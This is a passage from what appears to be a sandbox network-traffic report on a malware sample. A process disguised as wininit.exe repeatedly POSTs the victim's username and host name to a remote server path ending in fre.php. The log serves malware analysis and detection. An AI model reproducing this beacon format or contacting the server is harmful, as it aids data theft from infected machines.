                                                                                                                              Nov 20, 2024 10:58:12.724589109 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:13.483200073 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:13 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              65192.168.2.45863594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:13.653477907 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:13.658489943 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:14.396718025 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:14 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              66192.168.2.45864194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:14.541049004 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:14.545996904 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:15.281114101 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:15 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              67192.168.2.45865094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:15.455130100 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:15.460582972 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:16.229127884 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:16 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              68192.168.2.45865794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:16.382903099 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:16.391719103 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:17.138398886 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:17 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              69192.168.2.45866494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:17.288305998 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:17.293395996 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:18.031718016 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:17 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              70192.168.2.45867094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:18.181020021 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:18.186000109 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:18.916189909 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:18 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              71192.168.2.45867594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:19.103928089 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:19.112622023 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:19.983401060 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:19 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              72192.168.2.45868394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:20.131119967 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:20.136054039 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:20.889894962 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:20 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              73192.168.2.45868894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:21.040473938 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:21.045420885 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:21.775449038 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:21 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              74192.168.2.45869594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:21.930898905 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:21.935753107 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:22.695555925 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:22 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              75192.168.2.45870194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:22.850301027 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:22.855309963 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:23.591485023 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:23 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              76192.168.2.45870894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:23.753654003 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:23.760309935 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:24.491024017 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:24 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              77192.168.2.45871594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:24.634911060 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:24.639780998 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:25.390342951 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:25 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              78192.168.2.45872394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:25.542803049 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:25.552645922 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:26.277719021 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:26 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              79192.168.2.45873094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:26.428895950 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:26.433857918 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:27.285520077 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:27 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              80192.168.2.45873694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:27.432306051 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:27.437349081 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:28.175734043 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:28 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              81192.168.2.45874294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:28.321070910 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:28.325967073 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:29.063374043 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:28 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
